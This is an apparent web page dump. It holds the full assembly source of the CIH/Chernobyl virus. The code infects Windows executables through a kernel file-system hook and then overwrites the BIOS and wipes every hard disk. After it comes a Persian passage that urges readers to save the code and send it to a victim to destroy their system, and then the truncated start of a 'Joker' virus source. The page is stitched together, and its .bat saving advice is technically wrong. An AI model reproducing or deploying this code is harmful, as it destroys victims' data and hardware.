db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h
db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
dd 00000000h, VirusSize

OriginalAppEXE ENDS

; ****************************************************************************
; * My Virus Game *
; ****************************************************************************

; *********************************************************
; * Constant Define *
; *********************************************************

TRUE = 1
FALSE = 0

DEBUG = TRUE

MajorVirusVersion = 1
MinorVirusVersion = 4

VirusVersion = MajorVirusVersion*10h+MinorVirusVersion


IF DEBUG

FirstKillHardDiskNumber = 81h
HookExceptionNumber = 05h

ELSE

FirstKillHardDiskNumber = 80h
HookExceptionNumber = 03h

ENDIF


FileNameBufferSize = 7fh

; *********************************************************
; *********************************************************

VirusGame SEGMENT

ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame
ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame

; *********************************************************
; * Ring3 Virus Game Initial Program *
; *********************************************************

MyVirusStart:
push ebp

; *************************************
; * Let's Modify Structured Exception *
; * Handing, Prevent Exception Error *
; * Occurrence, Especially in NT. *
; *************************************

lea eax, [esp-04h*2]

xor ebx, ebx
xchg eax, fs:[ebx]

call @0
@0:
pop ebx

lea ecx, StopToRunVirusCode-@0[ebx]
push ecx

push eax

; *************************************
; * Let's Modify *
; * IDT(Interrupt Descriptor Table) *
; * to Get Ring0 Privilege... *
; *************************************

push eax ;
sidt [esp-02h] ; Get IDT Base Address
pop ebx ;

add ebx, HookExceptionNumber*08h+04h ; ZF = 0

cli

mov ebp, [ebx] ; Get Exception Base
mov bp, [ebx-04h] ; Entry Point

lea esi, MyExceptionHook-@1[ecx]

push esi

mov [ebx-04h], si ;
shr esi, 16 ; Modify Exception
mov [ebx+02h], si ; Entry Point Address

pop esi

; *************************************
; * Generate Exception to Get Ring0 *
; *************************************

int HookExceptionNumber ; GenerateException
ReturnAddressOfEndException = $

; *************************************
; * Merge All Virus Code Section *
; *************************************

push esi
mov esi, eax

LoopOfMergeAllVirusCodeSection:

mov ecx, [eax-04h]

rep movsb

sub eax, 08h

mov esi, [eax]

or esi, esi
jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1

jmp LoopOfMergeAllVirusCodeSection

QuitLoopOfMergeAllVirusCodeSection:

pop esi

; *************************************
; * Generate Exception Again *
; *************************************

int HookExceptionNumber ; GenerateException Again

; *************************************
; * Let's Restore *
; * Structured Exception Handing *
; *************************************

ReadyRestoreSE:
sti

xor ebx, ebx

jmp RestoreSE

; *************************************
; * When Exception Error Occurs, *
; * Our OS System should be in NT. *
; * So My Cute Virus will not *
; * Continue to Run, it Jmups to *
; * Original Application to Run. *
; *************************************

StopToRunVirusCode:
@1 = StopToRunVirusCode

xor ebx, ebx
mov eax, fs:[ebx]
mov esp, [eax]

RestoreSE:
pop dword ptr fs:[ebx]
pop eax

; *************************************
; * Return Original App to Execute *
; *************************************

pop ebp

push 00401000h ; Push Original
OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack

ret ; Return to Original App Entry Point

; *********************************************************
; * Ring0 Virus Game Initial Program *
; *********************************************************

MyExceptionHook:
@2 = MyExceptionHook

jz InstallMyFileSystemApiHook

; *************************************
; * Do My Virus Exist in System !? *
; *************************************

mov ecx, dr0
jecxz AllocateSystemMemoryPage

add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException

; *************************************
; * Return to Ring3 Initial Program *
; *************************************

ExitRing0Init:
mov [ebx-04h], bp ;
shr ebp, 16 ; Restore Exception
mov [ebx+02h], bp ;

iretd

; *************************************
; * Allocate SystemMemory Page to Use *
; *************************************

AllocateSystemMemoryPage:

mov dr0, ebx ; Set the Mark of My Virus Exist in System

push 00000000fh ;
push ecx ;
push 0ffffffffh ;
push ecx ;
push ecx ;
push ecx ;
push 000000001h ;
push 000000002h ;
int 20h ; VMMCALL _PageAllocate
_PageAllocate = $ ;
dd 00010053h ; Use EAX, ECX, EDX, and flags
add esp, 08h*04h

xchg edi, eax ; EDI = SystemMemory Start Address

lea eax, MyVirusStart-@2[esi]

iretd ; Return to Ring3 Initial Program

; *************************************
; * Install My File System Api Hook *
; *************************************

InstallMyFileSystemApiHook:

lea eax, FileSystemApiHook-@6[edi]

push eax ;
int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook
IFSMgr_InstallFileSystemApiHook = $ ;
dd 00400067h ; Use EAX, ECX, EDX, and flags

mov dr0, eax ; Save OldFileSystemApiHook Address

pop eax ; EAX = FileSystemApiHook Address

; Save Old IFSMgr_InstallFileSystemApiHook Entry Point
mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]
mov edx, [ecx]
mov OldInstallFileSystemApiHook-@3[eax], edx

; Modify IFSMgr_InstallFileSystemApiHook Entry Point
lea eax, InstallFileSystemApiHook-@3[eax]
mov [ecx], eax

cli

jmp ExitRing0Init

; *********************************************************
; * Code Size of Merge Virus Code Section *
; *********************************************************

CodeSizeOfMergeVirusCodeSection = offset $

; *********************************************************
; * IFSMgr_InstallFileSystemApiHook *
; *********************************************************

InstallFileSystemApiHook:
push ebx

call @4 ;
@4: ;
pop ebx ; mov ebx, offset FileSystemApiHook
add ebx, FileSystemApiHook-@4 ;

push ebx
int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook
IFSMgr_RemoveFileSystemApiHook = $
dd 00400068h ; Use EAX, ECX, EDX, and flags
pop eax

; Call Original IFSMgr_InstallFileSystemApiHook
; to Link Client FileSystemApiHook
push dword ptr [esp+8]
call OldInstallFileSystemApiHook-@3[ebx]
pop ecx

push eax

; Call Original IFSMgr_InstallFileSystemApiHook
; to Link My FileSystemApiHook
push ebx
call OldInstallFileSystemApiHook-@3[ebx]
pop ecx

mov dr0, eax ; Adjust OldFileSystemApiHook Address

pop eax

pop ebx

ret

; *********************************************************
; * Static Data *
; *********************************************************

OldInstallFileSystemApiHook dd ?

; *********************************************************
; * IFSMgr_FileSystemHook *
; *********************************************************

; *************************************
; * IFSMgr_FileSystemHook Entry Point *
; *************************************

FileSystemApiHook:
@3 = FileSystemApiHook

pushad

call @5 ;
@5: ;
pop esi ; mov esi, offset VirusGameDataStartAddress
add esi, VirusGameDataStartAddress-@5

; *************************************
; * Is OnBusy !? *
; *************************************

test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy )
jnz pIFSFunc ; goto pIFSFunc

; *************************************
; * Is OpenFile !? *
; *************************************

; if ( NotOpenFile )
; goto prevhook
lea ebx, [esp+20h+04h+04h]
cmp dword ptr [ebx], 00000024h
jne prevhook

; *************************************
; * Enable OnBusy *
; *************************************

inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy

; *************************************
; * Get FilePath's DriveNumber, *
; * then Set the DriveName to *
; * FileNameBuffer. *
; *************************************
; * Ex. If DriveNumber is 03h, *
; * DriveName is 'C:'. *
; *************************************

; mov esi, offset FileNameBuffer
add esi, FileNameBuffer-@6

push esi

mov al, [ebx+04h]
cmp al, 0ffh
je CallUniToBCSPath

add al, 40h
mov ah, ':'

mov [esi], eax

inc esi
inc esi

; *************************************
; * UniToBCSPath *
; *************************************
; * This Service Converts *
; * a Canonicalized Unicode Pathname *
; * to a Normal Pathname in the *
; * Specified BCS Character Set. *
; *************************************

CallUniToBCSPath:
push 00000000h
push FileNameBufferSize
mov ebx, [ebx+10h]
mov eax, [ebx+0ch]
add eax, 04h
push eax
push esi
int 20h ; VXDCall UniToBCSPath
UniToBCSPath = $
dd 00400041h
add esp, 04h*04h

; *************************************
; * Is FileName '.EXE' !? *
; *************************************

; cmp [esi+eax-04h], '.EXE'
cmp [esi+eax-04h], 'EXE.'
pop esi
jne DisableOnBusy

IF DEBUG

; *************************************
; * Only for Debug *
; *************************************

; cmp [esi+eax-06h], 'FUCK'
cmp [esi+eax-06h], 'KCUF'
jne DisableOnBusy

ENDIF

; *************************************
; * Is Open Existing File !? *
; *************************************

; if ( NotOpenExistingFile )
; goto DisableOnBusy
cmp word ptr [ebx+18h], 01h
jne DisableOnBusy

; *************************************
; * Get Attributes of the File *
; *************************************

mov ax, 4300h
int 20h ; VXDCall IFSMgr_Ring0_FileIO
IFSMgr_Ring0_FileIO = $
dd 00400032h

jc DisableOnBusy

push ecx

; *************************************
; * Get IFSMgr_Ring0_FileIO Address *
; *************************************

mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi]
mov edi, [edi]

; *************************************
; * Is Read-Only File !? *
; *************************************

test cl, 01h
jz OpenFile

; *************************************
; * Modify Read-Only File to Write *
; *************************************

mov ax, 4301h
xor ecx, ecx
call edi ; VXDCall IFSMgr_Ring0_FileIO

; *************************************
; * Open File *
; *************************************

OpenFile:
xor eax, eax
mov ah, 0d5h
xor ecx, ecx
xor edx, edx
inc edx
mov ebx, edx
inc ebx
call edi ; VXDCall IFSMgr_Ring0_FileIO

xchg ebx, eax ; mov ebx, FileHandle

; *************************************
; * Need to Restore *
; * Attributes of the File !? *
; *************************************

pop ecx

pushf

test cl, 01h
jz IsOpenFileOK

; *************************************
; * Restore Attributes of the File *
; *************************************

mov ax, 4301h
call edi ; VXDCall IFSMgr_Ring0_FileIO

; *************************************
; * Is Open File OK !? *
; *************************************

IsOpenFileOK:
popf

jc DisableOnBusy

; *************************************
; * Open File Already Succeed. ^__^ *
; *************************************

push esi ; Push FileNameBuffer Address to Stack

pushf ; Now CF = 0, Push Flag to Stack

add esi, DataBuffer-@7 ; mov esi, offset DataBuffer

; ***************************
; * Get OffsetToNewHeader *
; ***************************

xor eax, eax
mov ah, 0d6h

; For Doing Minimal VirusCode's Length,
; I Save EAX to EBP.
mov ebp, eax

push 00000004h
pop ecx
push 0000003ch
pop edx
call edi ; VXDCall IFSMgr_Ring0_FileIO

mov edx, [esi]

; ***************************
; * Get 'PE\0' Signature *
; * of ImageFileHeader, and *
; * Infected Mark. *
; ***************************

dec edx

mov eax, ebp
call edi ; VXDCall IFSMgr_Ring0_FileIO

; ***************************
; * Is PE !? *
; ***************************
; * Is the File *
; * Already Infected !? *
; ***************************
; * WinZip Self-Extractor *
; * doesn't Have Infected *
; * Mark Because My Virus *
; * doesn't Infect it. *
; ***************************

; cmp [esi], '\0PE\0'
cmp dword ptr [esi], 00455000h
jne CloseFile

; *************************************
; * The File is ^o^ *
; * PE(Portable Executable) indeed. *
; *************************************
; * The File isn't also Infected. *
; *************************************

; *************************************
; * Start to Infect the File *
; *************************************
; * Registers Use Status Now : *
; * *
; * EAX = 04h *
; * EBX = File Handle *
; * ECX = 04h *
; * EDX = 'PE\0\0' Signature of *
; * ImageFileHeader Pointer's *
; * Former Byte. *
; * ESI = DataBuffer Address ==> @8 *
; * EDI = IFSMgr_Ring0_FileIO Address *
; * EBP = D600h ==> Read Data in File *
; *************************************
; * Stack Dump : *
; * *
; * ESP => ------------------------- *
; * | EFLAG(CF=0) | *
; * ------------------------- *
; * | FileNameBufferPointer | *
; * ------------------------- *
; * | EDI | *
; * ------------------------- *
; * | ESI | *
; * ------------------------- *
; * | EBP | *
; * ------------------------- *
; * | ESP | *
; * ------------------------- *
; * | EBX | *
; * ------------------------- *
; * | EDX | *
; * ------------------------- *
; * | ECX | *
; * ------------------------- *
; * | EAX | *
; * ------------------------- *
; * | Return Address | *
; * ------------------------- *
; *************************************

push ebx ; Save File Handle

push 00h ; Set VirusCodeSectionTableEndMark

; ***************************
; * Let's Set the *
; * Virus' Infected Mark *
; ***************************

push 01h ; Size
push edx ; Pointer of File
push edi ; Address of Buffer

; ***************************
; * Save ESP Register *
; ***************************

mov dr1, esp

; ***************************
; * Let's Set the *
; * NewAddressOfEntryPoint *
; * ( Only First Set Size ) *
; ***************************

push eax ; Size

; ***************************
; * Let's Read *
; * Image Header in File *
; ***************************

mov eax, ebp
mov cl, SizeOfImageHeaderToRead
add edx, 07h ; Move EDX to NumberOfSections
call edi ; VXDCall IFSMgr_Ring0_FileIO

; ***************************
; * Let's Set the *
; * NewAddressOfEntryPoint *
; * ( Set Pointer of File, *
; * Address of Buffer ) *
; ***************************

lea eax, (AddressOfEntryPoint-@8)[edx]
push eax ; Pointer of File

lea eax, (NewAddressOfEntryPoint-@8)[esi]
push eax ; Address of Buffer

; ***************************
; * Move EDX to the Start *
; * of SectionTable in File *
; ***************************

movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi]
lea edx, [eax+edx+12h]

; ***************************
; * Let's Get *
; * Total Size of Sections *
; ***************************

mov al, SizeOfScetionTable

; I Assume NumberOfSections <= 0ffh
mov cl, (NumberOfSections-@8)[esi]

mul cl

; ***************************
; * Let's Set Section Table *
; ***************************

; Move ESI to the Start of SectionTable
lea esi, (StartOfSectionTable-@8)[esi]

push eax ; Size
push edx ; Pointer of File
push esi ; Address of Buffer

; ***************************
; * The Code Size of Merge *
; * Virus Code Section and *
; * Total Size of Virus *
; * Code Section Table Must *
; * be Small or Equal the *
; * Unused Space Size of *
; * Following Section Table *
; ***************************

inc ecx
push ecx ; Save NumberOfSections+1

shl ecx, 03h
push ecx ; Save TotalSizeOfVirusCodeSectionTable

add ecx, eax
add ecx, edx

sub ecx, (SizeOfHeaders-@9)[esi]
not ecx
inc ecx

; Save My Virus First Section Code
; Size of Following Section Table...
; ( Not Include the Size of Virus Code Section Table )
push ecx

xchg ecx, eax ; ECX = Size of Section Table

; Save Original Address of Entry Point
mov eax, (AddressOfEntryPoint-@9)[esi]
add eax, (ImageBase-@9)[esi]
mov (OriginalAddressOfEntryPoint-@9)[esi], eax

cmp word ptr [esp], small CodeSizeOfMergeVirusCodeSection
jl OnlySetInfectedMark

; ***************************
; * Read All Section Tables *
; ***************************

mov eax, ebp
call edi ; VXDCall IFSMgr_Ring0_FileIO

; ***************************
; * Full Modify the Bug : *
; * WinZip Self-Extractor *
; * Occurs Error... *
; ***************************
; * So When User Opens *
; * WinZip Self-Extractor, *
; * Virus Doesn't Infect it.*
; ***************************
; * First, Virus Gets the *
; * PointerToRawData in the *
; * Second Section Table, *
; * Reads the Section Data, *
; * and Tests the String of *
; * 'WinZip(R)'...... *
; ***************************

xchg eax, ebp

push 00000004h
pop ecx

push edx
mov edx, (SizeOfScetionTable+PointerToRawData-@9)[esi]
add edx, 12h

call edi ; VXDCall IFSMgr_Ring0_FileIO

; cmp [esi], 'nZip'
cmp dword ptr [esi], 'piZn'
je NotSetInfectedMark

pop edx

; ***************************
; * Let's Set Total Virus *
; * Code Section Table *
; ***************************

; EBX = My Virus First Section Code
; Size of Following Section Table
pop ebx
pop edi ; EDI = TotalSizeOfVirusCodeSectionTable
pop ecx ; ECX = NumberOfSections+1

push edi ; Size

add edx, ebp
push edx ; Pointer of File

add ebp, esi
push ebp ; Address of Buffer

; ***************************
; * Set the First Virus *
; * Code Section Size in *
; * VirusCodeSectionTable *
; ***************************

lea eax, [ebp+edi-04h]
mov [eax], ebx

; ***************************
; * Let's Set My Virus *
; * First Section Code *
; ***************************

push ebx ; Size

add edx, edi
push edx ; Pointer of File

lea edi, (MyVirusStart-@9)[esi]
push edi ; Address of Buffer

; ***************************
; * Let's Modify the *
; * AddressOfEntryPoint to *
; * My Virus Entry Point *
; ***************************

mov (NewAddressOfEntryPoint-@9)[esi], edx

; ***************************
; * Setup Initial Data *
; ***************************

lea edx, [esi-SizeOfScetionTable]
mov ebp, offset VirusSize

jmp StartToWriteCodeToSections

; ***************************
; * Write Code to Sections *
; ***************************

LoopOfWriteCodeToSections:

add edx, SizeOfScetionTable

mov ebx, (SizeOfRawData-@9)[edx]
sub ebx, (VirtualSize-@9)[edx]
jbe EndOfWriteCodeToSections

push ebx ; Size

sub eax, 08h
mov [eax], ebx

mov ebx, (PointerToRawData-@9)[edx]
add ebx, (VirtualSize-@9)[edx]
push ebx ; Pointer of File

push edi ; Address of Buffer

mov ebx, (VirtualSize-@9)[edx]
add ebx, (VirtualAddress-@9)[edx]
add ebx, (ImageBase-@9)[esi]
mov [eax+4], ebx

mov ebx, [eax]
add (VirtualSize-@9)[edx], ebx

; Section contains initialized data ==> 00000040h
; Section can be Read. ==> 40000000h
or (Characteristics-@9)[edx], 40000040h

StartToWriteCodeToSections:

sub ebp, ebx
jbe SetVirusCodeSectionTableEndMark

add edi, ebx ; Move Address of Buffer

EndOfWriteCodeToSections:

loop LoopOfWriteCodeToSections

; ***************************
; * Only Set Infected Mark *
; ***************************

OnlySetInfectedMark:
mov esp, dr1

jmp WriteVirusCodeToFile

; ***************************
; * Not Set Infected Mark *
; ***************************

NotSetInfectedMark:
add esp, 3ch

jmp CloseFile

; ***************************
; * Set Virus Code *
; * Section Table End Mark *
; ***************************

SetVirusCodeSectionTableEndMark:

; Adjust Size of Virus Section Code to Correct Value
add [eax], ebp
add [esp+08h], ebp

; Set End Mark
xor ebx, ebx
mov [eax-04h], ebx

; ***************************
; * When VirusGame Calls *
; * VxDCall, VMM Modifies *
; * the 'int 20h' and the *
; * 'Service Identifier' *
; * to 'Call [XXXXXXXX]'. *
; ***************************
; * Before Writing My Virus *
; * to File, I Must Restore *
; * them First. ^__^ *
; ***************************

lea eax, (LastVxDCallAddress-2-@9)[esi]

mov cl, VxDCallTableSize

LoopOfRestoreVxDCallID:
mov word ptr [eax], 20cdh

mov edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi]
mov [eax+2], edx

movzx edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[esi]
sub eax, edx

loop LoopOfRestoreVxDCallID

; ***************************
; * Let's Write *
; * Virus Code to the File *
; ***************************

WriteVirusCodeToFile:
mov eax, dr1
mov ebx, [eax+10h]
mov edi, [eax]

LoopOfWriteVirusCodeToFile:

pop ecx
jecxz SetFileModificationMark

mov esi, ecx
mov eax, 0d601h
pop edx
pop ecx

call edi ; VXDCall IFSMgr_Ring0_FileIO

jmp LoopOfWriteVirusCodeToFile

; ***************************
; * Let's Set CF = 1 ==> *
; * Need to Restore File *
; * Modification Time *
; ***************************

SetFileModificationMark:
pop ebx
pop eax

stc ; Enable CF(Carry Flag)
pushf

; *************************************
; * Close File *
; *************************************

CloseFile:
xor eax, eax
mov ah, 0d7h
call edi ; VXDCall IFSMgr_Ring0_FileIO

; *************************************
; * Need to Restore File Modification *
; * Time !? *
; *************************************

popf
pop esi
jnc IsKillComputer

; *************************************
; * Restore File Modification Time *
; *************************************

mov ebx, edi

mov ax, 4303h
mov ecx, (FileModificationTime-@7)[esi]
mov edi, (FileModificationTime+2-@7)[esi]
call ebx ; VXDCall IFSMgr_Ring0_FileIO

; *************************************
; * Disable OnBusy *
; *************************************

DisableOnBusy:
dec byte ptr (OnBusy-@7)[esi] ; Disable OnBusy

; *************************************
; * Call Previous FileSystemApiHook *
; *************************************

prevhook:
popad

mov eax, dr0 ;
jmp [eax] ; Jump to prevhook

; *************************************
; * Call the Function that the IFS *
; * Manager Would Normally Call to *
; * Implement this Particular I/O *
; * Request. *
; *************************************

pIFSFunc:
mov ebx, esp
push dword ptr [ebx+20h+04h+14h] ; Push pioreq
call [ebx+20h+04h] ; Call pIFSFunc
pop ecx ;

mov [ebx+1ch], eax ; Modify EAX Value in Stack

; ***************************
; * After Calling pIFSFunc, *
; * Get Some Data from the *
; * Returned pioreq. *
; ***************************

cmp dword ptr [ebx+20h+04h+04h], 00000024h
jne QuitMyVirusFileSystemHook

; *****************
; * Get the File *
; * Modification *
; * Date and Time *
; * in DOS Format.*
; *****************

mov eax, [ecx+28h]
mov (FileModificationTime-@6)[esi], eax

; ***************************
; * Quit My Virus' *
; * IFSMgr_FileSystemHook *
; ***************************

QuitMyVirusFileSystemHook:

popad

ret

; *************************************
; * Kill Computer !? ... *^_^* *
; *************************************

IsKillComputer:
; Get Now Day from BIOS CMOS
mov al, 07h
out 70h, al
in al, 71h

xor al, 26h ; ??/26/????

IF DEBUG
jmp DisableOnBusy
ELSE
jnz DisableOnBusy
ENDIF

; **************************************
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; **************************************

; ***************************
; * Kill BIOS EEPROM *
; ***************************

mov bp, 0cf8h
lea esi, IOForEEPROM-@7[esi]

; ***********************
; * Show BIOS Page in *
; * 000E0000 - 000EFFFF *
; * ( 64 KB ) *
; ***********************

mov edi, 8000384ch
mov dx, 0cfeh
cli
call esi

; ***********************
; * Show BIOS Page in *
; * 000F0000 - 000FFFFF *
; * ( 64 KB ) *
; ***********************

mov di, 0058h
dec edx ; and al,0fh
mov word ptr (BooleanCalculateCode-@10)[esi], 0f24h
call esi

; ***********************
; * Show the BIOS Extra *
; * ROM Data in Memory *
; * 000E0000 - 000E01FF *
; * ( 512 Bytes ) *
; * , and the Section *
; * of Extra BIOS can *
; * be Writted... *
; ***********************

lea ebx, EnableEEPROMToWrite-@10[esi]

mov eax, 0e5555h
mov ecx, 0e2aaah
call ebx
mov byte ptr [eax], 60h

push ecx
loop $

; ***********************
; * Kill the BIOS Extra *
; * ROM Data in Memory *
; * 000E0000 - 000E007F *
; * ( 80h Bytes ) *
; ***********************

xor ah, ah
mov [eax], al

xchg ecx, eax
loop $

; ***********************
; * Show and Enable the *
; * BIOS Main ROM Data *
; * 000E0000 - 000FFFFF *
; * ( 128 KB ) *
; * can be Writted... *
; ***********************

mov eax, 0f5555h
pop ecx
mov ch, 0aah
call ebx
mov byte ptr [eax], 20h

loop $

; ***********************
; * Kill the BIOS Main *
; * ROM Data in Memory *
; * 000FE000 - 000FE07F *
; * ( 80h Bytes ) *
; ***********************

mov ah, 0e0h
mov [eax], al

; ***********************
; * Hide BIOS Page in *
; * 000F0000 - 000FFFFF *
; * ( 64 KB ) *
; ***********************
; or al,10h
mov word ptr (BooleanCalculateCode-@10)[esi], 100ch
call esi

; ***************************
; * Kill All HardDisk *
; ***************************************************
; * IOR Structure of IOS_SendCommand Needs *
; ***************************************************
; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? *
; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? *
; ***************************************************

KillHardDisk:
xor ebx, ebx
mov bh, FirstKillHardDiskNumber
push ebx
sub esp, 2ch
push 0c0001000h
mov bh, 08h
push ebx
push ecx
push ecx
push ecx
push 40000501h
inc ecx
push ecx
push ecx

mov esi, esp
sub esp, 0ach

LoopOfKillHardDisk:
int 20h
dd 00100004h ; VXDCall IOS_SendCommand

cmp word ptr [esi+06h], 0017h
je KillNextDataSection

ChangeNextHardDisk:
inc byte ptr [esi+4dh]

jmp LoopOfKillHardDisk

KillNextDataSection:
add dword ptr [esi+10h], ebx
mov byte ptr [esi+4dh], FirstKillHardDiskNumber

jmp LoopOfKillHardDisk

; ***************************
; * Enable EEPROM to Write *
; ***************************

EnableEEPROMToWrite:
mov [eax], cl
mov [ecx], al
mov byte ptr [eax], 80h
mov [eax], cl
mov [ecx], al

ret

; ***************************
; * IO for EEPROM *
; ***************************

IOForEEPROM:
@10 = IOForEEPROM

xchg eax, edi
xchg edx, ebp
out dx, eax

xchg eax, edi
xchg edx, ebp
in al, dx

BooleanCalculateCode = $
or al, 44h

xchg eax, edi
xchg edx, ebp
out dx, eax

xchg eax, edi
xchg edx, ebp
out dx, al

ret

; *********************************************************
; * Static Data *
; *********************************************************

LastVxDCallAddress = IFSMgr_Ring0_FileIO
VxDCallAddressTable db 00h
db IFSMgr_RemoveFileSystemApiHook-_PageAllocate
db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook
db IFSMgr_Ring0_FileIO-UniToBCSPath

VxDCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h
VxDCallTableSize = ($-VxDCallIDTable)/04h

; *********************************************************
; * Virus Version Copyright *
; *********************************************************

VirusVersionCopyright db 'CIH v'
db MajorVirusVersion+'0'
db '.'
db MinorVirusVersion+'0'
db ' TATUNG'

; *********************************************************
; * Virus Size *
; *********************************************************

VirusSize = $
; + SizeOfVirusCodeSectionTableEndMark(04h)
; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
; + SizeOfTheFirstVirusCodeSectionTable(04h)

; *********************************************************
; * Dynamic Data *
; *********************************************************

VirusGameDataStartAddress = VirusSize
@6 = VirusGameDataStartAddress
OnBusy db 0
FileModificationTime dd ?

FileNameBuffer db FileNameBufferSize dup(?)
@7 = FileNameBuffer

DataBuffer = $
@8 = DataBuffer
NumberOfSections dw ?
TimeDateStamp dd ?
SymbolsPointer dd ?
NumberOfSymbols dd ?
SizeOfOptionalHeader dw ?
_Characteristics dw ?
Magic dw ?
LinkerVersion dw ?
SizeOfCode dd ?
SizeOfInitializedData dd ?
SizeOfUninitializedData dd ?
AddressOfEntryPoint dd ?
BaseOfCode dd ?
BaseOfData dd ?
ImageBase dd ?
@9 = $
SectionAlignment dd ?
FileAlignment dd ?
OperatingSystemVersion dd ?
ImageVersion dd ?
SubsystemVersion dd ?
Reserved dd ?
SizeOfImage dd ?
SizeOfHeaders dd ?
SizeOfImageHeaderToRead = $-NumberOfSections

NewAddressOfEntryPoint = DataBuffer ; DWORD
SizeOfImageHeaderToWrite = 04h

StartOfSectionTable = @9
SectionName = StartOfSectionTable ; QWORD
VirtualSize = StartOfSectionTable+08h ; DWORD
VirtualAddress = StartOfSectionTable+0ch ; DWORD
SizeOfRawData = StartOfSectionTable+10h ; DWORD
PointerToRawData = StartOfSectionTable+14h ; DWORD
PointerToRelocations = StartOfSectionTable+18h ; DWORD
PointerToLineNumbers = StartOfSectionTable+1ch ; DWORD
NumberOfRelocations = StartOfSectionTable+20h ; WORD
NumberOfLinenNmbers = StartOfSectionTable+22h ; WORD
Characteristics = StartOfSectionTable+24h ; DWORD
SizeOfScetionTable = Characteristics+04h-SectionName

; *********************************************************
; * Virus Total Need Memory *
; *********************************************************

VirusNeedBaseMemory = $

VirusTotalNeedMemory = @9
; + NumberOfSections(??)*SizeOfScetionTable(28h)
; + SizeOfVirusCodeSectionTableEndMark(04h)
; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
; + SizeOfTheFirstVirusCodeSectionTable(04h)

; *********************************************************
; *********************************************************

VirusGame ENDS

END FileHeader
</body>
</html>
</body>
</html>

برای ساخت این ویروس اول note pad را باز کرده و این کد ها را در آن کپی و پیست نمایید و بعد گزینه file را زده save as را زده بعد آنرا با پسوند bat ذخیره کنید مثلا Joker.bat و save را برای اتمام کار زده و حالا ویروس شما ساخته شد که مواظب باشید روی آن به هیچ وجه کلیک نکنید آنرا برای یکی بفرستید تا سیستم قربانی را به طور خفن داغون کنه. موفق باشید نظر یادتون نره!

title " Joker! virus. Written by The BOOT SECTOR Infector ... "
;
; Joker - This is a remake of the deceased "Joker/Jocker" virus. The original
; had multiple programming errors in it that kept it from replicating.
; My version is much more successful.
;


page 255,80
code segment word public 'code'
assume cs:code,ds:code
org 100h
main proc;edure


;EQUates...
idc equ 69h ;ID character - (note: 69)
cr equ 13 ;ASCII for carriage return
lf equ 10 ;ASCII for line feed

;End codes. These determine what happens after the string is displayed.

terminate equ 0 ;Terminate program after display
halt equ 1 ;Cause the system to hang after display
SimulateCritErr equ 2 ;Simulate the critical error handler
return2host equ 3 ;Resume program immediately
FlashFloppy equ 4 ;Wait for a key, then reset Drive A:
WaitKey equ 5 ;Wait for a key, then resume program
PauseKey equ 6 ;Same thing, but uses a pause message
